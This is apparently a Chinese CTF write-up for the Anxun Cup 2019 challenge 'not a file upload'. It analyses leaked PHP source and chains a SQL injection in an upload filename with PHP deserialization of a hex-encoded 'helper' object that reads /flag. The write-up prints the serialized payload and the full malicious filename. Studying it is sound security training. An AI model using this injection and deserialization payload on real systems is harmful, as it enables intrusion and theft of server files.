[安洵杯 2019]不是文件上传

信息泄露github的源码

public function view_files($path){
   if ($this->ifview == False){  //不用管直接就是FALSE
      return False;
      //The function is not yet perfect, it is not open yet.
   }
   $content = file_get_contents($path);
   echo $content;
}

从这里得到flag文件

    function __destruct(){
      # Read some config html
      $this->view_files($this->config);
   }
}

反序列化结束后会自动调用

从config写值

反序列化可控

接下来就是入口类

//getimagesize

$_FILES 是一个预定义的数组，用来获取通过 POST 方法上传文件的相关信息

序列化img_ext信息来自$fileinfo $fileinfo 来自getfile()

public function getfile($input)
{
   if(isset($input)){
      $rs = $this->check($_FILES[$input]);
   }
   return $rs;
}

而信息来自check（）

public function check($info)
{
   $basename = substr(md5(time().uniqid()),9,16);//造一个basename 
   $filename = $info["name"];
   $ext = substr(strrchr($filename, '.'), 1);//例如a.jpg只留a
   $cate_exts = array("jpg","gif","png","jpeg");
   if(!in_array($ext,$cate_exts)){
      die("
Please upload the correct image file!!!
");
   }
    $title = str_replace(".".$ext,'',$filename);//替换名字
    return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
}

check的代码意思是

return array('title'=>$title,'filename'=>$basename.".".$ext,'ext'=>$ext,'path'=>$this->folder.$basename.".".$ext);
}

这里获取值一共5个1,2,3,4,5

O:6:"helper":2:{s:9:"*ifview";b:1;s:9:"*config";s:5:"/flag";}

INSERT INTO images (".(implode(",",$sql_fields)).") VALUES(".(implode(",",$sql_val)).")

SQL语句

implode(",",$sql_fields:
用逗号组合sql_fields

$sql_fields[] = "“.$key_temp.”";
反引号中间包含str_replace(chr(0).‘*’.chr(0), ‘’, $key);

$key_temp = str_replace(chr(0).'*'.chr(0), '', $key);

替换后的key

foreach($data as $key=>$value)
data的键数组

因为是私有类，所以要插入*

但是有个语句是将*替换

a’,‘1’,‘1’,‘1’,‘需要反序列化的值’（0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d）

上传即可

filename="a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#.png"

那么title的值为：

"a','1','1','1',0x4f3a363a2268656c706572223a323a7b733a393a22002a00696676696577223b623a313b733a393a22002a00636f6e666967223b733a353a222f666c6167223b7d)#"